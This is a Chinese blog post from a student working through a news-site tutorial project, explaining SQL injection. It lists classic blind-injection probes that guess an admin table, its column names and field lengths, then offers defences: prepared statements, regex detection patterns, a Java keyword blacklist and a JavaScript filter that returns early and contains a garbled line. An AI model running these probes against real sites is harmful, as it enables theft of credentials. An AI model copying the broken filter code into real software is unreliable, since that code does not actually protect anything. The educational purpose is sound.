【牛腩新闻】——浅入浅出SQL注入

于 2018-04-21 15:53:19 发布
阅读量207 收藏
点赞数
分类专栏: 项目总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanwenwennihao/article/details/80030413
版权

【牛腩新闻】——浅入浅出SQL注入

 

What

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

 

Why

SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。

 

举几个小例子:

1.判断有无注入点

; and 1=1 and 1=2

2.猜表一般的表的名称无非是adminadminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin)---判断是否存在admin这张表

3.猜帐号数目 如果遇到0<返回正确页面, 1<返回错误页面,说明帐号数目就是1个

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4.猜解字段名称 在len() 括号里面加上我们想到的字段名称.

and 1=(select count(*) from admin wherelen(*)>0)--

and 1=(select count(*) from admin where len(用户字段名称name)>0)

and 1=(select count(*) from admin where len(密码字段名称password)>0)

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止

and 1=(select count(*) from admin wherelen(*)>0)

and 1=(select count(*) from admin wherelen(name)>6) 错误

and 1=(select count(*) from admin wherelen(name)>5) 正确 长度是6

and 1=(select count(*) from admin wherelen(name)=6) 正确

and 1=(select count(*) from admin wherelen(password)>11) 正确

and 1=(select count(*) from admin wherelen(password)>12) 错误 长度是12

and 1=(select count(*) from admin wherelen(password)=12) 正确

 

防止SQL注入

1.(简单又有效的方法)PreparedStatement

采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可。

使用好处:

(1).代码的可读性和可维护性.

(2).PreparedStatement尽最大可能提高性能.

(3).最重要的一点是极大地提高了安全性.

原理:

sql注入只对sql语句的准备(编译)过程有破坏作用

而PreparedStatement已经准备好了,执行阶段只是把输入串作为数据处理,

而不再对sql语句进行解析,准备,因此也就避免了sql注入问题.

 

2.使用正则表达式过滤传入的参数

下面是具体的正则表达式:

检测SQL meta-characters的正则表达式 :

/(\%27)|(\’)|(\-\-)|(\%23)|(#)/ix

修正检测SQL meta-characters的正则表达式 :/((\%3D)|(=))[^\n]*((\%27)|(\’)|(\-\-)|(\%3B)|(:))/i

典型的SQL 注入攻击的正则表达式 :/\w*((\%27)|(\’))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

检测SQL注入,UNION查询关键字的正则表达式:/((\%27)|(\’))union/ix(\%27)|(\’)

检测MS SQL Server SQL注入攻击的正则表达式:

/exec(\s|\+)+(s|x)p\w+/ix

等等…..

 

3.字符串过滤

比较通用的一个方法:

(||之间的参数可以根据自己程序的需要添加)

public static boolean sql_inj(String str)

{

String inj_str ="'|and|exec|insert|select|delete|update|

count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,";

String inj_stra[] =split(inj_str,"|");

for (int i=0 ; i &lt; inj_stra.length ;i++ )

{

if (str.indexOf(inj_stra[i])&gt;=0)

{

return true;

}

}

return false;

}

 

4.jsp中调用该函数检查是否包函非法字符

 

防止SQL从URL注入:

 

5.JSP页面判断代码:

 

使用javascript在客户端进行不安全字符屏蔽

功能介绍:检查是否含有”‘”,”\\”,”/”

参数说明:要检查的字符串

返回值:0:是1:不是

函数名是

function check(a)

{

return 1;

fibdn = new Array (”‘” ,”\\”,”/”);

i=fibdn.length;

j=a.length;

for (ii=0; ii<i;ii++)

{ for (jj=0; jj<j;jj++)

{ temp1=a.charAt(jj);

temp2=fibdn[ii];

if (tem’;p1==temp2)

{ return 0; }

}

}

return 1;

}

===================================

总的说来,防范一般的SQL注入只要在代码规范上下点功夫就可以了

 

严文文-Chris
关注
专栏目录
牛腩】后台代码完结总结
颗粒归仓
06-07 1156
牛腩已经学习了差不多两个星期了,终于把后台代码部分完成了,看的速度很慢,但是通过看视频学习到了很多,有技巧方面的还有知识方面的,老师给我们讲解的很细致。 一 技巧方面 1.if之后tab的使用     需要if语句时只需要将敲出if之后直接按两下tab键就可以自动出现if语句段,这样就不用自己再去输小括号和大括号了,节省了时间,提高了效率。  2.将重复的代码放入工具箱中备用     将
牛腩新闻发布系统(完整源码)
08-28
为了保护用户数据和防止SQL注入等攻击,系统应该采用了安全的编程实践,例如使用预编译语句、对用户输入进行过滤和验证。 12. **部署与配置** 系统部署可能涉及服务器环境配置,如安装Web服务器(Apache或Nginx)...
牛腩SQL注入
北漂的IT小白菜
05-25 1079
今天在看牛腩视频的时候觉得好神奇呀,老师怎么可以在客户看到的界面上直接用一条带有SQL语句的字符串在向数据库插入一条记录的同时还删去了一条记录,我顿时惊讶死了,这个老师是怎么实现的呀?它是基于什么样的原理呢?       在后来的讲解中,老师解说道是利用SQL注入做到的。说实话,学习计算机也有不短的时间了,对于SQL注入这个大名还真是如雷贯耳。以前只是知道这个名词但是具体是什么就完全不知道了。经
牛腩新闻发布系统】——SQL注入
全力奔跑,梦在彼岸
06-26 1149
背景:前一段时间在学牛腩,在机房重构中的知识现在又复习了一遍,欠下的总是要还的,下面就来好好总结一下。 ——-未完待续
浅入浅出SQL注入
许小乖……是总攻
07-27 1808
已经开始了学习牛腩新闻发布系统,在讲后台代码的时候讲了一些重构SQLHelper的知识,存储过程和触发器等,这些以前都是接触过的。而SQL注入是以前没有注意过的,所以停下来总结学习一下SQL注入。       首先什么是SQL注入呢?       SQL注入概念          所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服
牛腩新闻发布系统(7)——总结
Reka's blog ^_^
07-27 1321
背景:牛腩新闻发布系统已经完成了,自我感觉还不错,很喜欢牛腩老师的幽默,每天跟着视频学习感觉很是惬意,尤其是当牛老师做的项目调试出错了,他都会很轻松的解决并且解释为什么会出现这样的错误,让人感觉他很是厉害,简直就是无所不能。俗话说:“兴趣是最好的老师”,现在感觉颇深。下面就简单介绍一下自己在学习牛腩后的收获,也算是给自己做一个阶段性的总结。 一、思想上     学习完牛腩新闻
SQL Server】--SQL注入
慢慢的长大
01-31 1281
Sql Inject概念:   百度解释:通过SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器质性恶意的SQL命令。   SQL注入攻击指的是通过构件特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
牛腩——SQLhelper
韩丽萍
05-29 711
前言 机房重构的时候用到了sqlhelper,现在学习牛腩又重新接触到了sqlhelper。机房的时候知道slqherlper要写4个方法,一个查询的,一个增删改的,这两个都分带参数和不带参数两种情况。但是没有想过为什么每个方法要传一个string类型的语句,一个类型,和参数。这次牛腩老师展示了sqlhelper从初级到一步步重构成完美助手类的过程。Step 1: SQL and Connecti
三层架构+防SQL注入——插入
weixin_30407613的博客
05-31 49
SQLHELP类 SQLHELP类///<summary>///执行带参数的增删改SQL语句或存储过程///</summary>///<paramname="cmdText">增删改SQL语句或存储过程</param>///<paramname...
牛腩视频总结(一)
海棠不惜胭脂色,独立蒙蒙细雨中
05-29 1192
牛腩老师讲的真好,很清楚,从一开始文档的设计到后来逐步完成功能,从这其中可以发现老师每编程一个功能都会反复回去看文档,我想这才是我们写文档的作用吧,之前做得机房收费系统,都是先做系统,然后再画图,毕竟每个阶段学习情况不同,我们学习方法也不同。通过对C/S的学习,我们对软件工程项目的过程有了很深的理解。从牛腩视频中学到了很多小技巧,总结如下。 一、SQL注入: 所谓SQL注入,就是通过把SQL
牛腩新闻发布系统_新闻发布系统_信息发布_
10-01
牛腩新闻发布系统】是一个专为新闻发布和信息发布的平台设计的应用程序。该系统的主要功能是支持用户进行新闻的增加、删除以及更新等操作,确保信息的实时性和准确性。在这个系统中,用户可以方便地管理各类新闻...
牛腩新闻系统
07-20
"牛腩新闻系统"是一个基于ASP.NET开发的新闻发布平台,主要针对新手开发者设计,用于学习和实践编程技术。这个系统提供了完整的源代码,包括数据库文件,使得用户可以直接运行并研究其内部工作原理。 ASP.NET是微软...
牛腩新闻发布系统(源码)
07-23
1. **安全防护**:源码可能包括防止SQL注入、XSS攻击的安全措施,以及对敏感数据的加密处理。 2. **负载均衡**:对于高访问量的新闻站点,系统可能设计有负载均衡策略,确保在高并发时仍能稳定运行。 3. **缓存机制*...
牛腩新闻系统快速下载地址
02-24
根据提供的文件信息,我们可以归纳出以下几个关键知识点: ### 一、牛腩新闻系统概述 **牛腩新闻系统**是一款基于ASP.NET技术栈构建的新闻管理系统。该系统旨在为用户提供一个简单易用、功能全面的新闻发布与管理...
实验室设备管理系统 SSM毕业设计 附带论文.zip
11-14
实验室设备管理系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
PPT高效插件神器推荐-最新发布.zip
最新发布
11-14
PPT高效插件神器推荐-最新发布.zip
数据中心机房基础设计及规划方案.pdf
11-14
数据中心机房是现代信息技术的核心设施,它承载着企业的重要数据和服务,因此,其基础设计与规划至关重要。在制定这样的方案时,需要考虑的因素繁多,包括但不限于以下几点: 1. **容量规划**:必须根据业务需求预测未来几年的数据处理和存储需求,合理规划机房的规模和设备容量。这涉及到服务器的数量、存储设备的容量以及网络带宽的需求等。 2. **电力供应**:数据中心是能源消耗大户,因此电力供应设计是关键。要考虑不间断电源(UPS)、备用发电机的容量,以及高效节能的电力分配系统,确保电力的稳定供应并降低能耗。 3. **冷却系统**:由于设备密集运行,散热问题不容忽视。合理的空调布局和冷却系统设计可以有效控制机房温度,避免设备过热引发故障。 4. **物理安全**:包括防火、防盗、防震、防潮等措施。需要设计防火分区、安装烟雾探测和自动灭火系统,设置访问控制系统,确保只有授权人员能进入。 5. **网络架构**:规划高速、稳定、冗余的网络架构,考虑使用光纤、以太网等技术,构建层次化网络,保证数据传输的高效性和安全性。 6. **运维管理**:设计易于管理和维护的IT基础设施,例如模块化设计便于扩展,集中监控系统可以实时查看设备状态,及时发现并解决问题。 7. **绿色数据中心**:随着环保意识的提升,绿色数据中心成为趋势。采用节能设备,利用自然冷源,以及优化能源管理策略,实现低能耗和低碳排放。 8. **灾难恢复**:考虑备份和恢复策略,建立异地灾备中心,确保在主数据中心发生故障时,业务能够快速恢复。 9. **法规遵从**:需遵循国家和地区的相关法律法规,如信息安全、数据保护和环境保护等,确保数据中心的合法运营。 10. **扩展性**:设计时应考虑到未来的业务发展和技术进步,保证机房有充足的扩展空间和升级能力。 技术创新在数据中心机房基础设计及规划方案中扮演了重要角色。例如,采用虚拟化技术可以提高硬件资源利用率,软件定义网络(SDN)提供更灵活的网络管理,人工智能和机器学习则有助于优化能源管理和故障预测。 总结来说,一个完整且高效的数据中心机房设计及规划方案,不仅需要满足当前的技术需求和业务目标,还需要具备前瞻性和可持续性,以适应快速变化的IT环境和未来可能的技术革新。同时,也要注重经济效益,平衡投资成本与长期运营成本,实现数据中心的高效、安全和绿色运行。
Visio软件全套资源及教程-最新发布.zip
11-14
Visio软件全套资源及教程-最新发布.zip
2000-2022年中国地级市生态韧性数据集(含原始数据、计算代码及结果,最新).zip
11-14
2000-2022年中国地级市生态韧性数据集(含原始数据、计算代码及结果,最新).zip
牛腩新闻发布系统:信息发布与管理新体验
而安全性方面,则需要实现用户认证、数据加密、防止SQL注入等安全措施。 7. 内容管理: 内容管理是新闻发布系统的核心功能之一,它涉及内容的创建、分类、存档、检索、统计等功能。为了高效管理内容,系统应提供...
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值